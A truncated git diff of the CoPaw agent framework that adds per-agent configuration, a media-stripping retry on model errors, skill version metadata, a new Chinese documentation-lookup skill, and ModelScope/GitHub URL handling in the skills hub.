- AGENTS.md - Detailed workflows, rules, and guidelines - SOUL.md - Core identity and behavioral principles - PROFILE.md - Agent identity and user profile @@ -145,6 +150,12 @@ def build_system_prompt_from_working_dir() -> str: All files are optional. If a file doesn't exist or can't be read, it will be skipped. If no files can be loaded, returns the default prompt. + Args: + working_dir: Directory to read markdown files from (if None, uses + global WORKING_DIR for backward compatibility) + enabled_files: List of filenames to load (if None, uses config or defaults) + agent_id: Agent identifier to include in system prompt (optional) + Returns: str: Constructed system prompt from markdown files. If no files exist, returns the default prompt. @@ -156,19 +167,44 @@ def build_system_prompt_from_working_dir() -> str: from ..constant import WORKING_DIR from ..config import load_config - # Load enabled files from config - config = load_config() - enabled_files = ( - config.agents.system_prompt_files - if config.agents.system_prompt_files is not None - else None - ) + # Use provided working_dir or fallback to global WORKING_DIR + if working_dir is None: + working_dir = Path(WORKING_DIR) + + # Load enabled files from parameter or config + if enabled_files is None: + # Use agent-specific config if agent_id provided + if agent_id: + from ..config.config import load_agent_config + + try: + agent_config = load_agent_config(agent_id) + enabled_files = agent_config.system_prompt_files + except (ValueError, FileNotFoundError): + # Agent not found in config, fallback to global config + config = load_config() + enabled_files = config.agents.system_prompt_files + else: + # Fallback to global config for backward compatibility + config = load_config() + enabled_files = config.agents.system_prompt_files builder = PromptBuilder( - working_dir=Path(WORKING_DIR), + working_dir=working_dir, enabled_files=enabled_files, ) - return builder.build() + prompt = builder.build() + + # Add agent identity information at the beginning of the prompt + if agent_id and agent_id != "default": + identity_header = ( + f"# Agent Identity\n\n" + f"Your agent id is `{agent_id}`. " + f"This is your unique identifier in the multi-agent system.\n\n" + ) + prompt = identity_header + prompt + + return prompt def build_bootstrap_guidance( diff --git a/src/copaw/agents/react_agent.py b/src/copaw/agents/react_agent.py index b9b9ed2fa..13c092fe3 100644 --- a/src/copaw/agents/react_agent.py +++ b/src/copaw/agents/react_agent.py @@ -7,7 +7,8 @@ import asyncio import logging import os -from typing import Any, List, Literal, Optional, Type +from pathlib import Path +from typing import Any, List, Literal, Optional, Type, TYPE_CHECKING from agentscope.agent import ReActAgent from agentscope.mcp import HttpStatefulClient, StdIOStatefulClient @@ -21,31 +22,38 @@ from .hooks import BootstrapHook, MemoryCompactionHook from .model_factory import create_model_and_formatter from .prompt import build_system_prompt_from_working_dir -from .tool_guard_mixin import ToolGuardMixin from .skills_manager import ( ensure_skills_initialized, get_working_skills_dir, list_available_skills, ) +from .tool_guard_mixin import ToolGuardMixin from .tools import ( browser_use, desktop_screenshot, edit_file, execute_shell_command, + graph_query, get_current_time, get_token_usage, + knowledge_search, + memify_run, + memify_status, read_file, send_file_to_user, + triplet_focus_search, write_file, create_memory_search_tool, ) from .utils import process_file_and_media_blocks_in_message from ..agents.memory import MemoryManager -from ..config import load_config from ..constant import ( - MEMORY_COMPACT_RATIO, WORKING_DIR, ) +from ..agents.memory import MemoryManager + +if TYPE_CHECKING: + from ..config.config import AgentProfileConfig logger = logging.getLogger(__name__) @@ -75,41 +83,57 @@ class CoPawAgent(ToolGuardMixin, ReActAgent): def __init__( self, + agent_config: "AgentProfileConfig", env_context: Optional[str] = None, enable_memory_manager: bool = True, mcp_clients: Optional[List[Any]] = None, - memory_manager: MemoryManager | None = None, + memory_manager: "MemoryManager | None" = None, request_context: Optional[dict[str, str]] = None, - max_iters: int = 50, - max_input_length: int = 128 * 1024, # 128K = 131072 tokens namesake_strategy: NamesakeStrategy = "skip", + workspace_dir: Path | None = None, ): """Initialize CoPawAgent. Args: + agent_config: Agent profile configuration containing all settings + including running config (max_iters, max_input_length, + memory_compact_threshold, etc.) and language setting. env_context: Optional environment context to prepend to system prompt enable_memory_manager: Whether to enable memory manager mcp_clients: Optional list of MCP clients for tool integration memory_manager: Optional memory manager instance - max_iters: Maximum number of reasoning-acting iterations - (default: 50) - max_input_length: Maximum input length in tokens for model - context window (default: 128K = 131072) + request_context: Optional request context with session_id, + user_id, channel, agent_id namesake_strategy: Strategy to handle namesake tool functions. Options: "override", "skip", "raise", "rename" (default: "skip") + workspace_dir: Workspace directory for reading prompt files + (if None, uses global WORKING_DIR) """ + self._agent_config = agent_config self._env_context = env_context self._request_context = dict(request_context or {}) - self._max_input_length = max_input_length self._mcp_clients = mcp_clients or [] self._namesake_strategy = namesake_strategy + self._workspace_dir = workspace_dir + + # Extract configuration from agent_config + running_config = agent_config.running + self._max_input_length = running_config.max_input_length + self._language = agent_config.language - # Memory compaction threshold: configurable ratio of max_input_length - self._memory_compact_threshold = int( - max_input_length * MEMORY_COMPACT_RATIO, + # Memory compaction settings from config + self._memory_compact_threshold = ( + running_config.memory_compact_threshold + ) + self._memory_compact_reserve = running_config.memory_compact_reserve + self._enable_tool_result_compact = ( + running_config.enable_tool_result_compact + ) + self._tool_result_compact_keep_n = ( + running_config.tool_result_compact_keep_n ) # Initialize toolkit with built-in tools @@ -132,7 +156,7 @@ def __init__( toolkit=toolkit, memory=InMemoryMemory(), formatter=formatter, - max_iters=max_iters, + max_iters=running_config.max_iters, ) # Setup memory manager @@ -148,6 +172,7 @@ def __init__( memory=self.memory, memory_manager=self.memory_manager, enable_memory_manager=self._enable_memory_manager, + agent_config=agent_config, ) # Register hooks @@ -169,14 +194,22 @@ def _create_toolkit( """ toolkit = Toolkit() - # Load config to check which tools are enabled - config = load_config() + # Check which tools are enabled from agent config enabled_tools = {} - if hasattr(config, "tools") and hasattr(config.tools, "builtin_tools"): - enabled_tools = { - name: tool_config.enabled - for name, tool_config in config.tools.builtin_tools.items() - } + try: + if hasattr(self._agent_config, "tools") and hasattr( + self._agent_config.tools, + "builtin_tools", + ): + builtin_tools = self._agent_config.tools.builtin_tools + enabled_tools = { + name: tool.enabled for name, tool in builtin_tools.items() + } + except Exception as e: + logger.warning( + f"Failed to load agent tools config: {e}, " + "all tools will be disabled", + ) # Map of tool functions tool_functions = { @@ -186,15 +219,58 @@ def _create_toolkit( "edit_file": edit_file, "browser_use": browser_use, "desktop_screenshot": desktop_screenshot, + "view_image": view_image, "send_file_to_user": send_file_to_user, "get_current_time": get_current_time, + "set_user_timezone": set_user_timezone, "get_token_usage": get_token_usage, + "knowledge_search": knowledge_search, + "graph_query": graph_query, + "memify_run": memify_run, + "memify_status": memify_status, + "triplet_focus_search": triplet_focus_search, } # Register only enabled tools for tool_name, tool_func in tool_functions.items(): + tool_enabled = enabled_tools.get(tool_name, True) + if tool_name == "knowledge_search": + tool_enabled = ( + tool_enabled + and bool(getattr(config.knowledge, "enabled", False)) + and bool(getattr(config.agents.running, "knowledge_enabled", True)) + and bool( + getattr( + config.agents.running, + "knowledge_retrieval_enabled", + True, + ) + ) + ) + elif tool_name == "graph_query": + tool_enabled = ( + tool_enabled + and bool(getattr(config.knowledge, "enabled", False)) + and bool(getattr(config.agents.running, "knowledge_enabled", True)) + and bool(getattr(config.knowledge, "graph_query_enabled", False)) + ) + elif tool_name in {"memify_run", "memify_status"}: + tool_enabled = ( + tool_enabled + and bool(getattr(config.knowledge, "enabled", False)) + and bool(getattr(config.agents.running, "knowledge_enabled", True)) + and bool(getattr(config.knowledge, "memify_enabled", False)) + ) + elif tool_name == "triplet_focus_search": + tool_enabled = ( + tool_enabled + and bool(getattr(config.knowledge, "enabled", False)) + and bool(getattr(config.agents.running, "knowledge_enabled", True)) + and bool(getattr(config.knowledge, "triplet_search_enabled", False)) + ) + # If tool not in config, enable by default (backward compatibility) - if enabled_tools.get(tool_name, True): + if tool_enabled: toolkit.register_tool_function( tool_func, namesake_strategy=namesake_strategy, @@ -206,16 +282,18 @@ def _create_toolkit( return toolkit def _register_skills(self, toolkit: Toolkit) -> None: - """Load and register skills from working directory. + """Load and register skills from workspace directory. Args: toolkit: Toolkit to register skills to """ - # Check skills initialization ensure_skills_initialized() - working_skills_dir = get_working_skills_dir() - available_skills = list_available_skills() + # Check skills initialization + ensure_skills_initialized(workspace_dir) + + working_skills_dir = get_working_skills_dir(workspace_dir) + available_skills = list_available_skills(workspace_dir) for skill_name in available_skills: skill_dir = working_skills_dir / skill_name @@ -236,9 +314,19 @@ def _build_sys_prompt(self) -> str: Returns: Complete system prompt string """ - sys_prompt = build_system_prompt_from_working_dir() + # Get agent_id from request_context + agent_id = ( + self._request_context.get("agent_id") + if self._request_context + else None + ) + + sys_prompt = build_system_prompt_from_working_dir( + working_dir=self._workspace_dir, + agent_id=agent_id, + ) if self._env_context is not None: - sys_prompt = self._env_context + "\n\n" + sys_prompt + sys_prompt = sys_prompt + "\n\n" + self._env_context return sys_prompt def _setup_memory_manager( @@ -279,10 +367,13 @@ def _setup_memory_manager( def _register_hooks(self) -> None: """Register pre-reasoning and pre-acting hooks.""" # Bootstrap hook - checks BOOTSTRAP.md on first interaction - config = load_config() + # Use workspace_dir if available, else fallback to WORKING_DIR + working_dir = ( + self._workspace_dir if self._workspace_dir else WORKING_DIR + ) bootstrap_hook = BootstrapHook( - working_dir=WORKING_DIR, - language=config.agents.language, + working_dir=working_dir, + language=self._language, ) self.register_instance_hook( hook_type="pre_reasoning", @@ -295,6 +386,7 @@ def _register_hooks(self) -> None: if self._enable_memory_manager and self.memory_manager is not None: memory_compact_hook = MemoryCompactionHook( memory_manager=self.memory_manager, + agent_config=self._agent_config, ) self.register_instance_hook( hook_type="pre_reasoning", @@ -495,6 +587,146 @@ def _rebuild_mcp_client(client: Any) -> Any | None: except Exception: # pylint: disable=broad-except return None + # ------------------------------------------------------------------ + # Media-block fallback: strip unsupported media blocks (image, audio, + # video) from memory and retry when the model rejects them. + # ------------------------------------------------------------------ + + _MEDIA_BLOCK_TYPES = {"image", "audio", "video"} + + async def _reasoning( + self, + tool_choice: Literal["auto", "none", "required"] | None = None, + ) -> Msg: + """Override reasoning with media-block fallback. + + If the model call fails with a bad-request error and memory + contains media blocks (image/audio/video), strip them all and + retry once. Calls ``super()._reasoning`` to keep the + ToolGuardMixin interception active. + """ + try: + return await super()._reasoning(tool_choice=tool_choice) + except Exception as e: + if not self._is_bad_request_or_media_error(e): + raise + + n_stripped = self._strip_media_blocks_from_memory() + if n_stripped == 0: + raise + + logger.warning( + "_reasoning failed (%s). " + "Stripped %d media block(s) from memory, retrying.", + e, + n_stripped, + ) + return await super()._reasoning(tool_choice=tool_choice) + + async def _summarizing(self) -> Msg: + """Override summarizing with the same media-block fallback.""" + try: + return await super()._summarizing() + except Exception as e: + if not self._is_bad_request_or_media_error(e): + raise + + n_stripped = self._strip_media_blocks_from_memory() + if n_stripped == 0: + raise + + logger.warning( + "_summarizing failed (%s). " + "Stripped %d media block(s) from memory, retrying.", + e, + n_stripped, + ) + return await super()._summarizing() + + @staticmethod + def _is_bad_request_or_media_error(exc: Exception) -> bool: + """Return True for 400-class or media-related model errors. + + Targets bad-request (400) errors because unsupported media + content typically causes request validation failures. Keyword + matching provides an extra safety net for providers that use + non-standard status codes. + """ + status = getattr(exc, "status_code", None) + if status == 400: + return True + + error_str = str(exc).lower() + keywords = [ + "image", + "audio", + "video", + "vision", + "multimodal", + "image_url", + ] + return any(kw in error_str for kw in keywords) + + _MEDIA_PLACEHOLDER = ( + "[Media content removed - model does not support this media type]" + ) + + def _strip_media_blocks_from_memory(self) -> int: + """Remove media blocks (image/audio/video) from all messages. + + Also strips media blocks nested inside ToolResultBlock outputs. + Inserts placeholder text when stripping leaves content empty to + avoid malformed API requests. + + Returns: + Total number of media blocks removed. + """ + media_types = self._MEDIA_BLOCK_TYPES + total_stripped = 0 + + for msg, _marks in self.memory.content: + if not isinstance(msg.content, list): + continue + + new_content = [] + for block in msg.content: + if ( + isinstance(block, dict) + and block.get("type") in media_types + ): + total_stripped += 1 + continue + + if ( + isinstance(block, dict) + and block.get("type") == "tool_result" + and isinstance(block.get("output"), list) + ): + original_len = len(block["output"]) + block["output"] = [ + item + for item in block["output"] + if not ( + isinstance(item, dict) + and item.get("type") in media_types + ) + ] + stripped_count = original_len - len(block["output"]) + total_stripped += stripped_count + if stripped_count > 0 and not block["output"]: + block["output"] = self._MEDIA_PLACEHOLDER + + new_content.append(block) + + if not new_content and total_stripped > 0: + new_content.append( + {"type": "text", "text": self._MEDIA_PLACEHOLDER}, + ) + + msg.content = new_content + + return total_stripped + async def reply( self, msg: Msg | list[Msg] | None = None, @@ -509,6 +741,11 @@ async def reply( Returns: Response message """ + # Set workspace_dir in context for tool functions + from ..config.context import set_current_workspace_dir + + set_current_workspace_dir(self._workspace_dir) + # Process file and media blocks in messages if msg is not None: await process_file_and_media_blocks_in_message(msg) diff --git a/src/copaw/agents/skills/browser_visible/SKILL.md b/src/copaw/agents/skills/browser_visible/SKILL.md index a38ba8db8..091b474f4 100644 --- a/src/copaw/agents/skills/browser_visible/SKILL.md +++ b/src/copaw/agents/skills/browser_visible/SKILL.md @@ -3,6 +3,7 @@ name: browser_visible description: "当用户希望打开真实可见的浏览器窗口(而非后台无头模式)时,使用 browser_use 的 headed 参数启动浏览器,随后可正常 open/snapshot/click 等。适用于用户想亲眼看到页面、演示或调试场景。" metadata: { + "builtin_skill_version": "1.0", "copaw": { "emoji": "🖥️", diff --git a/src/copaw/agents/skills/cron/SKILL.md b/src/copaw/agents/skills/cron/SKILL.md index 7f0a93d98..ebeea92ef 100644 --- a/src/copaw/agents/skills/cron/SKILL.md +++ b/src/copaw/agents/skills/cron/SKILL.md @@ -1,7 +1,7 @@ --- name: cron description: 通过 copaw 命令管理定时任务 - 创建、查询、暂停、恢复、删除任务 -metadata: { "copaw": { "emoji": "⏰" } } +metadata: { "builtin_skill_version": "1.0", "copaw": { "emoji": "⏰" } } --- # 定时任务管理 @@ -11,9 +11,12 @@ metadata: { "copaw": { "emoji": "⏰" } } ## 常用命令 ```bash -# 列出所有任务 +# 列出所有任务(默认操作 default agent) copaw cron list +# 为特定 agent 列出任务 +copaw cron list --agent-id abc123 + # 查看任务详情 copaw cron get @@ -31,6 +34,8 @@ copaw cron resume copaw cron run ``` +**注意**:所有命令都支持 `--agent-id` 参数,默认为 `default`。如果需要操作特定 agent 的任务,请指定对应的 agent ID。 + ## 创建任务 支持两种任务类型: @@ -40,7 +45,7 @@ copaw cron run ### 快速创建 ```bash -# 每天 9:00 发送文本消息 +# 每天 9:00 发送文本消息(默认 agent) copaw cron create \ --type text \ --name "每日早安" \ @@ -50,8 +55,9 @@ copaw cron create \ --target-session "CHANGEME" \ --text "早上好!" -# 每 2 小时向 Agent 提问 +# 为特定 agent 创建任务 copaw cron create \ + --agent-id abc123 \ --type agent \ --name "检查待办" \ --cron "0 */2 * * *" \ @@ -66,12 +72,16 @@ copaw cron create \ 创建任务需要: - `--type`:任务类型(text 或 agent) - `--name`:任务名称 -- `--cron`:cron 表达式(**UTC 时间**,如用户在 UTC+8 希望每天 9:00 执行,需填 `"0 1 * * *"`) -- `--channel`:目标频道(imessage / discord / dingtalk / qq / console) +- `--cron`:cron 表达式(如 `"0 9 * * *"` 表示每天 9:00) +- `--channel`:目标频道(console / feishu / dingtalk / discord / qq / telegram / imessage / matrix / mattermost 等)。用户未指定时,使用"当前的channel"的值 - `--target-user`:用户标识 - `--target-session`:会话标识 - `--text`:消息内容(text 类型)或提问内容(agent 类型) +### 可选参数 + +- `--agent-id`:指定 agent ID(默认:default)。用于多 agent 场景。 + ### 从 JSON 创建(复杂配置) ```bash @@ -80,15 +90,12 @@ copaw cron create -f job_spec.json ## Cron 表达式示例 -> **重要:`--cron` 参数中的时间为 UTC 时间。** 用户描述的时间默认为其所在时区的本地时间,创建定时任务前必须先将其换算为 UTC 时间后再填写。 -> 例如:用户在 UTC+8 时区,说"每天早上 9:00 执行",需填写 `0 1 * * *`(UTC 01:00 = 本地 09:00)。 - ``` -0 9 * * * # 每天 UTC 9:00(UTC+8 用户的 17:00,UTC-5 用户的 4:00) -0 */2 * * * # 每 2 小时(与时区无关) -30 8 * * 1-5 # UTC 工作日 8:30(UTC+9 用户的 17:30) -0 0 * * 0 # UTC 每周日零点(UTC+1 用户的周日 1:00) -*/15 * * * * # 每 15 分钟(与时区无关) +0 9 * * * # 每天 9:00 +0 */2 * * * # 每 2 小时 +30 8 * * 1-5 # 工作日 8:30 +0 0 * * 0 # 每周日零点 +*/15 * * * * # 每 15 分钟 ``` ## 使用建议 @@ -97,3 +104,4 @@ copaw cron create -f job_spec.json - 暂停/删除/恢复前,用 `copaw cron list` 查找 job_id - 排查问题时,用 `copaw cron state ` 查看状态 - 给用户的命令要完整、可直接复制执行 +- 记得指定 `--agent-id` 参数 diff --git a/src/copaw/agents/skills/dingtalk_channel/SKILL.md b/src/copaw/agents/skills/dingtalk_channel/SKILL.md index 284d3d6dc..e270e96dc 100644 --- a/src/copaw/agents/skills/dingtalk_channel/SKILL.md +++ b/src/copaw/agents/skills/dingtalk_channel/SKILL.md @@ -3,6 +3,7 @@ name: dingtalk_channel_connect description: "使用可视浏览器自动完成 CoPaw 的钉钉频道接入。适用于用户提到钉钉、DingTalk、开发者后台、Client ID、Client Secret、机器人、Stream 模式、绑定或配置 channel 的场景;支持遇到登录页时暂停,等待用户登录后继续。" metadata: { + "builtin_skill_version": "1.0", "copaw": { "emoji": "🤖", diff --git a/src/copaw/agents/skills/docx/SKILL.md b/src/copaw/agents/skills/docx/SKILL.md index 089822e69..26feac8b1 100644 --- a/src/copaw/agents/skills/docx/SKILL.md +++ b/src/copaw/agents/skills/docx/SKILL.md @@ -2,6 +2,7 @@ name: docx description: "Use this skill whenever the user wants to create, read, edit, or manipulate Word documents (.docx files). Triggers include: any mention of \"Word doc\", \"word document\", \".docx\", or requests to produce professional documents with formatting like tables of contents, headings, page numbers, or letterheads. Also use when extracting or reorganizing content from .docx files, inserting or replacing images in documents, performing find-and-replace in Word files, working with tracked changes or comments, or converting content into a polished Word document. If the user asks for a \"report\", \"memo\", \"letter\", \"template\", or similar deliverable as a Word or .docx file, use this skill. Do NOT use for PDFs, spreadsheets, Google Docs, or general coding tasks unrelated to document generation." license: Proprietary. LICENSE.txt has complete terms +metadata: { "builtin_skill_version": "1.0" } --- > **Important:** All `scripts/` paths are relative to this skill directory. diff --git a/src/copaw/agents/skills/file_reader/SKILL.md b/src/copaw/agents/skills/file_reader/SKILL.md index 60fd67d46..c7cca0201 100644 --- a/src/copaw/agents/skills/file_reader/SKILL.md +++ b/src/copaw/agents/skills/file_reader/SKILL.md @@ -3,6 +3,7 @@ name: file_reader description: "Read and summarize text-based file types only. Prefer read_file for text formats; use execute_shell_command for type detection when needed. PDF/Office/images/archives are handled by other skills." metadata: { + "builtin_skill_version": "1.0", "copaw": { "emoji": "📄", diff --git a/src/copaw/agents/skills/guidance/SKILL.md b/src/copaw/agents/skills/guidance/SKILL.md new file mode 100644 index 000000000..785610f12 --- /dev/null +++ b/src/copaw/agents/skills/guidance/SKILL.md @@ -0,0 +1,141 @@ +--- +name: guidance +description: "回答用户关于 CoPaw 安装与配置的问题:优先定位并阅读本地文档,再提炼答案;若本地信息不足,兜底访问官网文档。" +metadata: + { + "builtin_skill_version": "1.0", + "copaw": + { + "emoji": "🧭", + "requires": {} + } + } +--- + +# CoPaw 安装与配置问答指南 + +当用户询问 **CoPaw 的安装、初始化、环境配置、依赖要求、常见配置项** 时,使用本 skill。 + +核心原则: + +- 先查本地文档,再回答 +- 回答要基于已读到的内容,不臆测 +- 回答语言与用户提问语言保持一致 + +## 标准流程 + + +### 第一步:定位文档位置 + +**查找记忆中的文档目录** + +首先你可以查看memory中是否有文档目录,如果有则直接使用,如果没有则继续执行下一步。 + +```bash +# 获取memory中的文档目录 +DOC_DIR=$(find ~/.copaw/memory/ -type d -name "docs") +``` + +如果 memory 中没有文档目录,则继续执行下面的逻辑。 + +**检查项目源码中的文档目录** + +执行以下脚本逻辑来获取变量 $COPAW_ROOT: + +```bash +# 获取二进制绝对路径 +COP_PATH=$(which copaw 2>/dev/null || whereis copaw | awk '{print $2}') + +# 逻辑推导:如果路径包含 .copaw/bin/copaw,则根目录在其上三层 +# 例如:/path/to/CoPaw/.copaw/bin/copaw -> /path/to/CoPaw +if [[ "$COP_PATH" == *".copaw/bin/copaw" ]]; then + COPAW_ROOT=$(echo "$COP_PATH" | sed 's/\/\.copaw\/bin\/copaw//') +else + # 兜底:尝试获取所在目录的父目录 + COPAW_ROOT=$(dirname $(dirname "$COP_PATH") 2>/dev/null || echo ".") +fi + +echo "Detected CoPaw Root: $COPAW_ROOT" +``` + +验证并列出文档目录: +使用推导出的 $COPAW_ROOT 定位文档: + +```bash +# 组合标准文档路径 +="$COPAW_ROOT/website/public/docs/" + +# 检查路径是否存在并列出文件 +if [ -d "$DOC_DIR" ]; then + find "$DOC_DIR" -type f -name "*.md" | head -n 100 +else + # 如果推导路径不对,执行全局模糊搜索 + find "$COPAW_ROOT" -type d -name "docs" | grep "website/public/docs" +fi +``` +**如果项目文档不存在,搜索工作目录** + +如果还是找不到文档,搜索 copaw 安装路径下的可用文档内容: + +```bash +# 寻找 faq.en.md 或 config.zh.md 等特征文件 +FILE_PATH=$(find . -type f -name "faq.en.md" -o -name "config.zh.md" | head -n 1) +if [ -n "$FILE_PATH" ]; then + # 使用 dirname 获取该文件所在的目录 + DOC_DIR=$(dirname "$FILE_PATH") +fi +``` +如果找到了文档目录,请你记录在 memory 中,格式为: + +```markdown +# 文档目录 +$DOC_DIR = +``` + +### 第二步:文档检索与匹配 + +文档文件命名格式为 `..md`(如 `config.zh.md`、`config.en.md`、`quickstart.zh.md`)。 + +使用 find 命令在目标目录中列出所有符合后缀的文档,并根据文件名关键字(如 install, env, setup)锁定目标作为 。 + +```bash +# 列出所有符合后缀的文档 +find $DOC_DIR -type f -name "*.md" +``` + +如果没有合适的文档,则在下一步阅读所有文档内容。 + + +### 第三步:阅读文档内容 + +找到候选文档后,读取并确认与问题相关的段落。可使用: + +- `cat ` +- `file_reader` skill(推荐用于更长文档或分段读取) + +如果文档很长,优先读取和问题最相关的章节(安装步骤、配置项、示例命令、注意事项、版本要求)。 + +### 第四步:提取信息并作答 + +从文档中提取关键信息,组织成可执行答案: + +- 先给直接结论 +- 再给步骤/命令/配置示例 +- 补充必要前置条件与常见坑 + +语言要求:回答语言必须与用户提问语言一致(中文问就中文答,英文问就英文答)。 + +### 第五步(可选):官网检索 + +若前面步骤无法完成(本地无文档、文档缺失、信息不足),使用官网作为兜底: + +- http://copaw.agentscope.io/ + +基于官网可获得内容继续回答,并在答案中明确说明该结论来自官网文档。 + +## 输出质量要求 + +- 不编造不存在的配置项或命令 +- 遇到版本差异时,明确标注“需以当前文档版本为准” +- 涉及路径、命令、配置键时,尽量给可复制的原文片段 +- 若信息仍不足,明确缺口并告诉用户还需要哪类信息(例如操作系统、安装方式、报错日志) diff --git a/src/copaw/agents/skills/himalaya/SKILL.md b/src/copaw/agents/skills/himalaya/SKILL.md index 92ba144ad..84075ebc1 100644 --- a/src/copaw/agents/skills/himalaya/SKILL.md +++ b/src/copaw/agents/skills/himalaya/SKILL.md @@ -4,6 +4,7 @@ description: "CLI to manage emails via IMAP/SMTP. Use `himalaya` to list, read, homepage: https://github.com/pimalaya/himalaya metadata: { + "builtin_skill_version": "1.0", "openclaw": { "emoji": "📧", diff --git a/src/copaw/agents/skills/news/SKILL.md b/src/copaw/agents/skills/news/SKILL.md index 4b3891b2f..ffe5f6a49 100644 --- a/src/copaw/agents/skills/news/SKILL.md +++ b/src/copaw/agents/skills/news/SKILL.md @@ -3,6 +3,7 @@ name: news description: "Look up the latest news for the user from specified news sites. Provides authoritative URLs for politics, finance, society, world, tech, sports, and entertainment. Use browser_use to open each URL and snapshot to get content, then summarize for the user." metadata: { + "builtin_skill_version": "1.0", "copaw": { "emoji": "📰", diff --git a/src/copaw/agents/skills/pdf/SKILL.md b/src/copaw/agents/skills/pdf/SKILL.md index 4a8a11e66..c199c1454 100644 --- a/src/copaw/agents/skills/pdf/SKILL.md +++ b/src/copaw/agents/skills/pdf/SKILL.md @@ -2,6 +2,7 @@ name: pdf description: Use this skill whenever the user wants to do anything with PDF files. This includes reading or extracting text/tables from PDFs, combining or merging multiple PDFs into one, splitting PDFs apart, rotating pages, adding watermarks, creating new PDFs, filling PDF forms, encrypting/decrypting PDFs, extracting images, and OCR on scanned PDFs to make them searchable. If the user mentions a .pdf file or asks to produce one, use this skill. license: Proprietary. LICENSE.txt has complete terms +metadata: { "builtin_skill_version": "1.0" } --- > **Important:** All `scripts/` paths are relative to this skill directory. diff --git a/src/copaw/agents/skills/pptx/SKILL.md b/src/copaw/agents/skills/pptx/SKILL.md index 61533146f..afdc21e8f 100644 --- a/src/copaw/agents/skills/pptx/SKILL.md +++ b/src/copaw/agents/skills/pptx/SKILL.md @@ -2,6 +2,7 @@ name: pptx description: "Use this skill any time a .pptx file is involved in any way — as input, output, or both. This includes: creating slide decks, pitch decks, or presentations; reading, parsing, or extracting text from any .pptx file (even if the extracted content will be used elsewhere, like in an email or summary); editing, modifying, or updating existing presentations; combining or splitting slide files; working with templates, layouts, speaker notes, or comments. Trigger whenever the user mentions \"deck,\" \"slides,\" \"presentation,\" or references a .pptx filename, regardless of what they plan to do with the content afterward. If a .pptx file needs to be opened, created, or touched, use this skill." license: Proprietary. LICENSE.txt has complete terms +metadata: { "builtin_skill_version": "1.0" } --- > **Important:** All `scripts/` paths are relative to this skill directory. diff --git a/src/copaw/agents/skills/xlsx/SKILL.md b/src/copaw/agents/skills/xlsx/SKILL.md index cd639c3d3..de1b093ec 100644 --- a/src/copaw/agents/skills/xlsx/SKILL.md +++ b/src/copaw/agents/skills/xlsx/SKILL.md @@ -2,6 +2,7 @@ name: xlsx description: "Use this skill any time a spreadsheet file is the primary input or output. This means any task where the user wants to: open, read, edit, or fix an existing .xlsx, .xlsm, .csv, or .tsv file (e.g., adding columns, computing formulas, formatting, charting, cleaning messy data); create a new spreadsheet from scratch or from other data sources; or convert between tabular file formats. Trigger especially when the user references a spreadsheet file by name or path — even casually (like \"the xlsx in my downloads\") — and wants something done to it or produced from it. Also trigger for cleaning or restructuring messy tabular data files (malformed rows, misplaced headers, junk data) into proper spreadsheets. The deliverable must be a spreadsheet file. Do NOT trigger when the primary deliverable is a Word document, HTML report, standalone Python script, database pipeline, or Google Sheets API integration, even if tabular data is involved." license: Proprietary. LICENSE.txt has complete terms +metadata: { "builtin_skill_version": "1.0" } --- > **Important:** All `scripts/` paths are relative to this skill directory. diff --git a/src/copaw/agents/skills_hub.py b/src/copaw/agents/skills_hub.py index ba81e7851..255e8a231 100644 --- a/src/copaw/agents/skills_hub.py +++ b/src/copaw/agents/skills_hub.py @@ -11,8 +11,9 @@ import io import zipfile from dataclasses import dataclass +from pathlib import Path from typing import Any -from urllib.parse import urlencode, urlparse, unquote +from urllib.parse import quote, urlencode, urlparse, unquote from urllib.error import HTTPError, URLError from urllib.request import Request, urlopen @@ -705,6 +706,38 @@ def _extract_lobehub_identifier(url: str) -> str: return "" +def _extract_modelscope_skill_spec( + url: str, +) -> tuple[str, str, str] | None: + """ + Parse ModelScope skills URL into (owner, skill_name, version_hint). + """ + parsed = urlparse(url) + host = (parsed.netloc or "").lower() + if host not in {"modelscope.cn", "www.modelscope.cn"}: + return None + parts = [unquote(p) for p in parsed.path.split("/") if p] + if len(parts) < 3 or parts[0] != "skills": + return None + + owner_part = parts[1].strip() + skill_name = parts[2].strip() + if not owner_part or not skill_name: + return None + owner = owner_part[1:] if owner_part.startswith("@") else owner_part + owner = owner.strip() + if not owner: + return None + + version_hint = "" + if len(parts) >= 6 and parts[3] == "archive" and parts[4] == "zip": + archive_name = parts[5].strip() + if archive_name.endswith(".zip"): + archive_name = archive_name[: -len(".zip")] + version_hint = archive_name + return owner, skill_name, version_hint + + def _extract_github_spec( url: str, ) -> tuple[str, str, str, str] | None: @@ -796,6 +829,13 @@ def _github_api_url(owner: str, repo: str, suffix: str) -> str: return f"{base}/{cleaned}" if cleaned else base +def _github_encode_path(path: str) -> str: + cleaned = path.strip("/") + if not cleaned: + return "" + return quote(cleaned, safe="/") + + def _github_get_default_branch(owner: str, repo: str) -> str: repo_meta = _http_json_get(_github_api_url(owner, repo, "")) if isinstance(repo_meta, dict): @@ -855,7 +895,8 @@ def _github_get_content_entry( path: str, ref: str, ) -> dict[str, Any]: - content_url = _github_api_url(owner, repo, f"contents/{path}") + encoded_path = _github_encode_path(path) + content_url = _github_api_url(owner, repo, f"contents/{encoded_path}") data = _http_json_get(content_url, {"ref": ref}) if not isinstance(data, dict): raise ValueError(f"Unexpected GitHub response for path: {path}") @@ -868,7 +909,9 @@ def _github_get_dir_entries( path: str, ref: str, ) -> list[dict[str, Any]]: - content_url = _github_api_url(owner, repo, f"contents/{path}") + encoded_path = _github_encode_path(path) + suffix = "contents" if not encoded_path else f"contents/{encoded_path}" + content_url = _github_api_url(owner, repo, suffix) data = _http_json_get(content_url, {"ref": ref}) if isinstance(data, list): return [x for x in data if isinstance(x, dict)] @@ -914,15 +957,15 @@ def _github_collect_tree_files( repo: str, ref: str, root: str, - subdir: str, max_files: int = 200, ) -> dict[str, str]: files: dict[str, str] = {} - pending = [_join_repo_path(root, subdir)] + pending = [root] if root else [""] visited = 0 while pending: current_dir = pending.pop() - entries = _github_get_dir_entries(owner, repo, current_dir, ref) + target_dir = current_dir or "" + entries = _github_get_dir_entries(owner, repo, target_dir, ref) for entry in entries: entry_type = str(entry.get("type") or "") entry_path = str(entry.get("path") or "") @@ -934,10 +977,6 @@ def _github_collect_tree_files( if entry_type != "file": continue rel = _relative_from_root(entry_path, root) - if not ( - rel.startswith("references/") or rel.startswith("scripts/") - ): - continue files[rel] = _github_read_file(entry) visited += 1 if visited >= max_files: @@ -1038,20 +1077,14 @@ def _fetch_bundle_from_skills_sh_url( ) files: dict[str, str] = {"SKILL.md": _github_read_file(skill_md_entry)} - for subdir in ("references", "scripts"): - try: - files.update( - _github_collect_tree_files( - 